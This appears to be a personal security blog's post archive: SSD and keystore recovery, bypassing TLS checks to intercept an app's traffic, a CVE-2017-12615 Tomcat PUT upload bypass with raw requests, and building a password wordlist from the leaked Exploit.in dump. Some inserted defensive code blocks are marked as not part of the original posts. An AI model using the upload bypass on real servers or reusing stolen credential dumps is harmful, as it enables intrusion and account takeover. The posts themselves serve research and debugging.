Saturday, May 15, 2021

Eth mining: How I lost and recovered 3.5K USD

What's up?

It's been a while. I know. Anyway, here's a story of 'what not to do', and of 'what you might want to try' when it comes to PC fixing.

Tldr; I lost my eth private keystore to a wallet containing 0.85 ethereum cryptocurrency and managed to recover it through some dumb luck.

Background

I was mining ETH back in 2017-2018 and in total got about 0.85 ETH for about $100 worth of electricity on a 1080 Ti that is primarily used for gaming. The card is still working well today :) Unfortunately, one mishap while transferring PC components between two systems cost me an SSD. I plugged a SATA power cable into the wrong 6-pin. Instead of a peripheral 6-pin, I inserted the cable into a GPU 6-pin. Needless to say, within a few seconds, I witnessed smoke and a burnt plastic smell. After frantically turning off the switch, I ended up with a burnt 6-pin power port on my PSU (had to change it), a cable burnt at both ends and a partially melted SATA power connector on the SSD. I didn't lose much. Only some game installations. Only 0.85 ETH, which back then was worth less than $200 USD, since my private keystore was stored on the SSD. It's ok, not much gone. I probably won't need anything on that SSD. So I thought.

2021 - Soaring of Cryptocurrency

Now, 1 ETH is worth about $4K USD. 0.85 ETH roughly equates to $3K++ USD. "F**K ME!" I thought.

 

So I carried this regret for a couple of months, and every now and then felt a stabbing pain in my wallet whenever someone mentioned cryptocurrency trading. But one day, I decided to fix it. Now it's no longer $180 - it's 3 grand. It deserves some attention.

ETH Wallet requirements

I created the Ethereum wallet back in 2017 using GETH when I first started mining. While I had the address and the passphrase, my private keystore was stored on that busted SSD. No keystore, no transacting rights. No transacting rights = no access to the stored Ethereum. No access = no $. :(

Search & Recovery

The moment I reached home, I started searching for it. First, I went through my cloud storage, hoping that my past self had actually backed up the keystore JSON file. After a while, the only thing I found was my wallet address. Sigh.

So I decided to look for the SSD with the burnt connector. After a while, I found it still attached to a metal cage meant to be installed in a PC case. I unscrewed it from the cage, examined it a little, and decided to see if I could clean it up a bit.

Cleaned up. But still busted.

Next, I went online and started researching replacing the SATA connector. As comfortable as I am with software and PC hardware, I have very little exposure to soldering. My kit was left in an office three jobs ago and I am not confident in gluing and soldering the component. I kept searching online for professionals to help, but feared the shops out there might access my data without my permission if they successfully repaired the SSD. I know, it was not full-disk encrypted, but it was primarily a gaming machine, so back then I wasn't too worried.

Finally, I had an idea. A sorta 'hail mary pass' idea that I can try before I head down to a shop or something. I read that the SATA power connector has multiple pins, and a lot of them are built for redundancy.

I interpreted it as every 3 pins mapping to 1 "function".

"Two pins down. Maybe it's still connectable", I thought to myself. Knowing that I have a simple SATA/IDE to USB 2.0 adapter kit that can be used to connect an internal HDD/SSD to the PC via USB, I took it out and tried to connect a SATA power cable to the busted SSD connector. Wow, it fits.

As we know, just because it fits doesn't mean it will work. Worst case, I'd just cut the power if I smelled burnt plastic or saw any smoke. So I attached everything to the drive, plugged the 3-pin power plug into my power point, *fingers crossed*, and turned on the power. Initially, nothing happened. But after about 30 seconds or so, I started to see Win 10 attempting to mount the SSD. NEAT! :) After about a minute, it finally mounted fully. I WAS ABLE TO ACCESS THE FILE SYSTEM. I immediately bee-lined to the location where my keystore was stored and extracted it.

"Power connector fits!" The simple temporary external SSD setup.

Dumb luck but good luck - it worked! Extracting the private keystore for the eth wallet.
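As an added check that is not part of the original post: once the keystore file is back, confirm it is a well-formed v3 keystore for the wallet address before relying on it (a backup of the wrong file is as useless as no backup). The sample keystore below is constructed with placeholder hex values and cannot be decrypted; decrypting a real one still needs the passphrase and is outside this snippet.

```python
import json

# Constructed keystore v3 document with placeholder hex values. It has the shape of
# a geth UTC--<timestamp>--<address> file but cannot be decrypted to anything.
SAMPLE_KEYSTORE = json.dumps({
    "address": "0f3a3b3c3d3e3f4041424344454647484950aabb",
    "crypto": {
        "cipher": "aes-128-ctr",
        "ciphertext": "00" * 32,
        "cipherparams": {"iv": "11" * 16},
        "kdf": "scrypt",
        "kdfparams": {"dklen": 32, "n": 262144, "p": 1, "r": 8, "salt": "22" * 32},
        "mac": "33" * 32,
    },
    "id": "00000000-0000-0000-0000-000000000000",
    "version": 3,
})

REQUIRED_CRYPTO = ("cipher", "ciphertext", "cipherparams", "kdf", "kdfparams", "mac")
KDF_PARAMS = {"scrypt": ("dklen", "n", "p", "r", "salt"),
              "pbkdf2": ("dklen", "c", "prf", "salt")}


def normalize_address(addr):
    """Lower-case hex without 0x, so the keystore and wallet spellings compare equal."""
    addr = addr.strip().lower()
    return addr[2:] if addr.startswith("0x") else addr


def check_keystore(json_text, expected_address):
    """Return a list of problems; an empty list means the file is a well-formed v3
    keystore for expected_address (decrypting it still needs the passphrase)."""
    problems = []
    try:
        ks = json.loads(json_text)
    except ValueError as exc:
        return [f"not JSON: {exc}"]
    if ks.get("version") != 3:
        problems.append(f"unexpected version {ks.get('version')!r}")
    addr = normalize_address(str(ks.get("address", "")))
    if len(addr) != 40 or any(c not in "0123456789abcdef" for c in addr):
        problems.append("address is not 20 bytes of hex")
    elif addr != normalize_address(expected_address):
        problems.append("keystore address does not match the wallet address")
    crypto = ks.get("crypto", ks.get("Crypto", {}))  # some older files capitalise the key
    for field in REQUIRED_CRYPTO:
        if field not in crypto:
            problems.append(f"crypto.{field} missing")
    kdf = crypto.get("kdf")
    if kdf not in KDF_PARAMS:
        problems.append(f"unsupported kdf {kdf!r}")
    else:
        missing = [p for p in KDF_PARAMS[kdf] if p not in crypto.get("kdfparams", {})]
        if missing:
            problems.append("kdfparams missing: " + ", ".join(missing))
    return problems
```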

Moral of the story

Again, the cliche 'don't give up' and the taunting phrase 'try harder!' are parroted time after time. This time, it kind of fits. If I hadn't tried, I wouldn't have recovered $3K++ worth of Ethereum. Was it dangerous? Yes. But I had a plan (well, pulling the power plug IS a plan). Was I lucky? Probably. Was it worth it? Well, no burnt plastic and an extra 3 grand - definitely a 'HELL YEA'!

True story.

Regards,

JS @breaktoprotect

Saturday, February 1, 2020

Fixing [SSL: CERTIFICATE_VERIFY_FAILED]

Scenario:
You are developing a Python app that needs to perform OAuth and talk to Google APIs. You also want to intercept its HTTP traffic to understand or debug the app, but are faced with the following terrible, terrible message:

Traceback (most recent call last):
  File "alt_google_sample.py", line 17, in <module>
    creds = tools.run_flow(flow, store, http=my_http)
  File "C:\python38\lib\site-packages\oauth2client\_helpers.py", line 133, in positional_wrapper
    return wrapped(*args, **kwargs)
  File "C:\python38\lib\site-packages\oauth2client\tools.py", line 243, in run_flow
    credential = flow.step2_exchange(code, http=http)
  File "C:\python38\lib\site-packages\oauth2client\_helpers.py", line 133, in positional_wrapper
    return wrapped(*args, **kwargs)
  File "C:\python38\lib\site-packages\oauth2client\client.py", line 2053, in step2_exchange
    resp, content = transport.request(
  File "C:\python38\lib\site-packages\oauth2client\transport.py", line 280, in request
    return http_callable(uri, method=method, body=body, headers=headers,
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1982, in request
    (response, content) = self._request(
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1650, in _request
    (response, content) = self._conn_request(
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1557, in _conn_request
    conn.connect()
  File "C:\python38\lib\site-packages\httplib2\__init__.py", line 1326, in connect
    self.sock = self._context.wrap_socket(sock, server_hostname=self.host)
  File "C:\python38\lib\ssl.py", line 500, in wrap_socket
    return self.sslsocket_class._create(
  File "C:\python38\lib\ssl.py", line 1040, in _create
    self.do_handshake()
  File "C:\python38\lib\ssl.py", line 1309, in do_handshake
    self._sslobj.do_handshake()
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1108)

>:(

What's the issue?
If you're doing man-in-the-middle (MITM) interception of HTTP requests/responses, your TLS/SSL verification will certainly fail. Unfortunately, 'verify=False' does not work, as the Google API client library uses httplib2 rather than requests. However, all is not lost.

Remediation:
Import httplib2, instantiate an Http() object and pass 'disable_ssl_certificate_validation=True' as the argument.

If you are using the Google Tutorial's sample code, this won't exactly work. :(


Solution #1: Disable the SSL verification altogether during testing.
...
import httplib2
from oauth2client import client, file, tools
from googleapiclient.discovery import build

# Skips certificate verification entirely, so the proxy's self-signed chain is
# accepted; keep this Http object to local testing.
my_http = httplib2.Http(disable_ssl_certificate_validation=True)

SCOPES = "https://www.googleapis.com/auth/calendar.readonly"
store = file.Storage('token.json')
creds = store.get()

if not creds or creds.invalid:
    flow = client.flow_from_clientsecrets('credentials.json', SCOPES)
    creds = tools.run_flow(flow, store, http=my_http)
# build() sits outside the if, so it also runs when a cached token.json was still valid
service = build('calendar', 'v3', http=creds.authorize(my_http))
...

Solution #2: Use the proxy's self-signed certificate
Extract your intercepting software's (e.g. Burp Suite) CA certificate, convert it to PEM format and then use the following code:
...
import httplib2
from oauth2client import client, file, tools
from googleapiclient.discovery import build

# Verification stays on, but ca_certs replaces the default CA bundle: only chains
# signed by the CA in burp.pem are trusted, so traffic must go through the proxy.
my_http = httplib2.Http(ca_certs='./burp.pem')

SCOPES = "https://www.googleapis.com/auth/calendar.readonly"
store = file.Storage('token.json')
creds = store.get()

if not creds or creds.invalid:
    flow = client.flow_from_clientsecrets('credentials.json', SCOPES)
    creds = tools.run_flow(flow, store, http=my_http)
# build() sits outside the if, so it also runs when a cached token.json was still valid
service = build('calendar', 'v3', http=creds.authorize(my_http))
...

For full code, please visit:
https://github.com/breaktoprotect/Useful-Code-Snippets/blob/master/googleapiclient_disable_ssl_verify.py

Screenshots of results - Yay - interception successful!

Sunday, December 1, 2019

Quick Tip: RT-AC85U to M1 (Huawei) internet connectivity issue

Hey,


If you're using an ASUS router and a Huawei ONT (e.g. from M1) and encounter difficulty connecting to the Internet, you may need to select non-automatic DNS settings and set DNS server to: 8.8.4.4


I had this issue specifically with the ASUS RT-AC85U and found this helpful. However, other ASUS routers probably have the same WAN configuration defaulting to automatic DNS detection, so setting it manually might help on a different model too.

If you're not with M1 as an ISP, you might want to check out your ISP site to see if they require certain special settings to be done on your router.

Turn it off and turn it on again
Sometimes it might just be unstable behaviour of the router or the ONT, and a power off-on might help. However, if you're here, you've likely already tried this, as it's usually top of the list for any support.

Other problems
If for whatever reason your ISP decided to whitelist the MAC address of the device connecting to their ONT, and you're swapping an old router for a spanking new one, you may need to call your ISP's support to whitelist it. This is very unlikely, but could potentially be the resolution to your issue.

Hope this helps.

JS

Saturday, September 23, 2017

The Case of CVE-2017-12615 Tomcat 7 PUT vulnerability

Exploit proof of concept:

You guys came for the code. So, click on my github repo link:


Warning: Don't die ROFL-ing as it's hilariously simple to exploit :D

Crux of the issue:

By design, if you try to upload a JSP file via the HTTP PUT method on the Tomcat server, it won't work. You can upload .html, .jpg, or any other extension except .jsp, .jspx and their variants.
For example, if you try:

Request:
PUT /myfile.jsp HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

You will get an error :( such as the one shown in the below response.
Response:
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 971
Date: Sat, 23 Sep 2017 06:07:27 GMT
Connection: close

...SNIPPED.<html><head><title>Apache Tomcat/7.0.79 - Error report</title><style><!--H1

However, you can bypass the extension check by appending a '/' after the .jsp extension:

Request:
PUT /myfile.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Response:
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:45:50 GMT
Connection: close

And I got the clue from the Apache site with the patch diff indicated here: 


Pre-requisite:

1. The PUT method is enabled through conf/web.xml (the DefaultServlet's readonly parameter set to false):
<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

2. No authentication is enforced via a security-constraint in the app's WEB-INF/web.xml, i.e. nothing like the following protects the path:
<auth-constraint>
    <role-name>admin</role-name>
</auth-constraint>
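As an added defensive check that is not the original post's code: a small audit of a Tomcat conf/web.xml for the two preconditions above (DefaultServlet readonly=false, and no auth-constraint covering PUT on /*). The web.xml excerpt is constructed for the example, not taken from a real deployment.

```python
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"

# Constructed excerpt shaped like Tomcat 7's conf/web.xml (not a real deployment
# file): readonly=false makes the DefaultServlet accept PUT and DELETE.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet><servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
  <security-constraint>
    <web-resource-collection><web-resource-name>Writes</web-resource-name>
      <url-pattern>/*</url-pattern><http-method>PUT</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>admin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""


def _name(elem):
    return elem.tag.rsplit("}", 1)[-1]  # local tag name, namespace stripped


def _children(elem, name):
    return [c for c in elem if _name(c) == name]


def _text(elem, name):
    found = _children(elem, name)
    return (found[0].text or "").strip() if found else ""


def default_servlet_writable(root):
    """True when the DefaultServlet is configured with readonly=false."""
    for servlet in root.iter():
        if _name(servlet) == "servlet" and _text(servlet, "servlet-class") == DEFAULT_SERVLET:
            for param in _children(servlet, "init-param"):
                if _text(param, "param-name") == "readonly":
                    return _text(param, "param-value").lower() == "false"
    return False  # Tomcat's default is readonly=true


def put_requires_auth(root):
    """True when a security-constraint with an auth-constraint covers PUT on /* (no http-method listed = all methods)."""
    for sc in root.iter():
        if _name(sc) != "security-constraint" or not _children(sc, "auth-constraint"):
            continue
        for wrc in _children(sc, "web-resource-collection"):
            patterns = [(c.text or "").strip() for c in _children(wrc, "url-pattern")]
            methods = [(c.text or "").strip().upper() for c in _children(wrc, "http-method")]
            if "/*" in patterns and (not methods or "PUT" in methods):
                return True
    return False


def audit_web_xml(xml_text):
    """Findings for the two preconditions; an empty list means PUT upload is not exposed."""
    root = ET.fromstring(xml_text)
    findings = []
    if default_servlet_writable(root):
        findings.append("DefaultServlet readonly=false: PUT/DELETE accepted")
        if not put_requires_auth(root):
            findings.append("no auth-constraint covers PUT on /*: unauthenticated upload")
    return findings
```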


Ok that's all for now. 

JS out.

Sunday, May 7, 2017

ihavebeenpwned?

Background
Like some of the paranoid folks out there, I've signed myself up to haveibeenpwned.com to get informed via email whenever a site gets hacked and my credentials are leaked. A few days ago, I received an email saying that the credentials associated with my email address (user id) were leaked on what seemed to be a Russian site known as 'exploit.in'. I needed to know which password was leaked before going on a mass change of all my accounts.


"Anti Public" combo list
It's said to be 458 million leaked credentials. Yep, holy.
For more information: https://haveibeenpwned.com/PwnedWebsites#ExploitIn

Hunting the leaked password database
After perusing some forums, I managed to get my hands on the dump. It's about 10GB zipped and 26GB unzipped. The files are named 1.txt through 111.txt, and the contents are in the format [email address]:[cleartext password]. You get Gmail, Yahoo and even some .ru email addresses in it.
Holy Batman, it's 26GB of cleartext credentials, which rivals the WPA list! On an SSD and an i5 3.2GHz, it still takes a few minutes to parse through the whole list. So back to the task "am I pwned?", I did a:
type * | findstr [partial my email address] > search_results.txt
After a couple of minutes, I found two entries: a Gmail and a Yahoo. The Yahoo one has long expired and the Gmail one is a super old password from multiple password changes ago. Phew for me. But still, quite a scare.

Charlie Mike: Investigate the passwords
Well, my curiosity goes beyond my own security status. I wanted to know what type of passwords were cracked and whether they were able to bruteforce complex ones. So I went on to perform some simple text processing. I'll do a post on this when I'm done. :)

Shiny New Dict
And of course, since it was verified to be a real credential dump, how can I ignore a super reliable word list? It came in a super easy format, so the following commands helped clean it up:
cat exploit.in_2016.lst | sort | uniq > exploit.in_2016_uniq.lst
cat exploit.in | cut -d":" -f 2- > exploit-in.txt   # -f 2- keeps passwords that themselves contain ':'

LOL 50% CPU utilization on sort.exe
This is going to take a while. Don't wait up.
JS.


Sunday, June 12, 2016

My Thoughts On "no internet for the public sector"

What up.

Recently, the Singapore government decided to cut off internet access for public servants for security reasons. It was said that we are one of the prime targets. WHO ISN'T?
To read more, goto: http://www.bbc.com/news/world-asia-36476422

What are my thoughts on this?
*This was first written as a Facebook comment in response to an annoying post with a bad analogy. I wanted it to be a sharp and poignant comment, but it ended up as a wall of text. So I've decided to put it up here, just in case anyone tries to pull off another BS argument about how cutting off the internet was a good decision.

No internet but haz email??? 
It's not pragmatic. Attackers will hit the systems which require internet access and perform lateral movement from there onwards. Exposure is limited, but not eliminated. Moreover, email is still active and IS a point of entry. AV is good at preventing known threats from entering, but most malware is bespoke and mutates faster than an AV can keep up (e.g. it will be weeks before AV gets updated to block an APT's malware, and months before systems get patched for zero-days). It is possible to worm through a network without requiring internet access. Yes, no internet = no beaconing back to a C2 (command and control) server, but that doesn't mean malware can't work. Malware can still worm through operating system vulnerabilities, performing lateral movement like a human attacker, and it's only a matter of time before it propagates and finds exfiltration points to beacon from or bring data out.

So does eliminating the Internet keep employees safe? To a certain point, but then you need to truly air gap your systems, i.e. no emails from the internet. But no one can truly work with pure intranet email, can they? Since they rely on AVs at the email entry point (and they had better be), why don't they allow internet via proxy servers (e.g. all HTTP/HTTPS has to go through these machines for internet access)? Keeping email while eliminating internet is like giving up ice cream to cut down calories but going nuts on Oreo cookies, thinking they are not as sugary. This is a security architecture problem. Pulling out the WAN cable is at best naive. If government agencies want to be truly secure by this logic, PEN AND PAPER PLEASE.

A Short Note on Defense
So how to defend? Preventive and detective controls. Make it hard and expensive for attackers to get in and maintain control. Preventive controls - the usual patch management, app whitelisting, host AV, exploit mitigation such as EMET, etc. etc. But mistake not, for they will NOT prevent. They are there to be speed bumps and trip wires. E.g. if you've got AV, an attacker will need to evade it and may avoid touching disk. This could mean PowerShell, DLL injection, reflective DLL loading, etc. If you are patched up in a timely manner, attackers need to spend $$ using their expensive zero-days. Once one is used and found during forensics, it's no longer a zero-day, or as effective. If you've got exploit mitigation, attackers need to make exploits that evade it. If you've got logging in place, attackers cannot perform active brute-force methods, as they may give away their position. If you've got... ok, you get what I mean. The same goes for application whitelisting, configuration hardening and other forms of controls on both endpoints and servers.

Detective controls - first harden every route, leaving only one or two paths open for attackers. Why do this? 1) You can map out likely attack paths for easier detection; 2) You can place more sensors on those paths for a higher detection rate; 3) It decreases false positives, allowing analysts to concentrate their effort on hunting down threat actors rather than responding to random events happening all over the network. Going further, implement a honeynet/honeypot within the network: place systems within the organisation that no one would normally or ever access, which serve the purpose of triggering alerts whenever a foreign threat actor logs in. This will trip up attackers when they are performing lateral movement. And yes, they WILL perform lateral movement. =) And there is more to talk about, such as going beyond the network and doing endpoint threat detection, or EDR, basically. Hunt for IOCs instead of being event-driven. Yada yada...
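The decoy-login trip wire described above, as an added example that is not part of the original post: it runs over constructed login-audit lines (the key=value line format and the decoy inventory are assumptions), alerts on any touch of a decoy host, and then flags later successful logins from the same source address as likely lateral movement from the same foothold.

```python
import re

# Constructed login-audit lines in a simple key=value form (not real logs).
SAMPLE_LOG = """\
2016-06-12T09:01:02 host=fileserver01 user=alice src=10.0.1.5 result=success
2016-06-12T09:03:10 host=decoy-fin-db user=svc_backup src=10.0.1.5 result=success
2016-06-12T09:04:44 host=hr-share user=bob src=10.0.2.9 result=success
2016-06-12T09:05:01 host=fileserver02 user=svc_backup src=10.0.1.5 result=success
2016-06-12T09:07:30 host=decoy-fin-db user=carol src=10.0.3.7 result=failure
"""

# Decoy systems nobody has a legitimate reason to log into (constructed inventory).
DECOY_HOSTS = {"decoy-fin-db", "decoy-hr-backup"}

LINE_RE = re.compile(
    r"(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)"
)


def decoy_alerts(log_text, decoy_hosts=DECOY_HOSTS):
    """Alerts as (kind, timestamp, src, host, user) tuples.

    Any login attempt against a decoy, successful or not, is an alert: nothing
    legitimate should ever reach it. Once a source address has touched a decoy,
    every later successful login from that address on any host is flagged too,
    since the same foothold is probably moving laterally through the network.
    """
    alerts = []
    tainted = set()  # source addresses that have touched a decoy
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        ev = m.groupdict()
        if ev["host"] in decoy_hosts:
            alerts.append(("decoy_touch", ev["ts"], ev["src"], ev["host"], ev["user"]))
            tainted.add(ev["src"])
        elif ev["src"] in tainted and ev["result"] == "success":
            alerts.append(("pivot_from_tainted_src", ev["ts"], ev["src"], ev["host"], ev["user"]))
    return alerts
```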

The landscape has changed so much - you can no longer expect to keep attackers out. It's not about "if" but "when". Security professionals' job is to give attackers a hard time getting in and, when they do, to detect and triage before they do any significant damage (e.g. exfiltrate data, deny service, set up watering-hole points). Most organisations don't even know that a threat actor is within their network until 6 months later, or until a "sale" on the darknet.

We need to do better than pulling out the ethernet cable. Don't you fucking give up on us!

Disturbed,
J.S.

Saturday, April 2, 2016

WHY YOU NO DETECT MY SSD?!

*Warning: This has nothing to do with security. Read at your own risk! :D

Do you have issues detecting your new SSD on Windows 10? The SSD shows up properly in your BIOS, but Windows 10's Disk Management shows nothing? Perform a 'Windows Memory Diagnostic'. Yes, it made no sense, but it worked for me. After WMD is done with its 2 passes, boot into the OS and go to Disk Management. You'll be prompted to initialize your shiny new SSD.
*This happens to my new samsung evo 850 250gb. 

Good luck, have fun! :)

Out,
JS.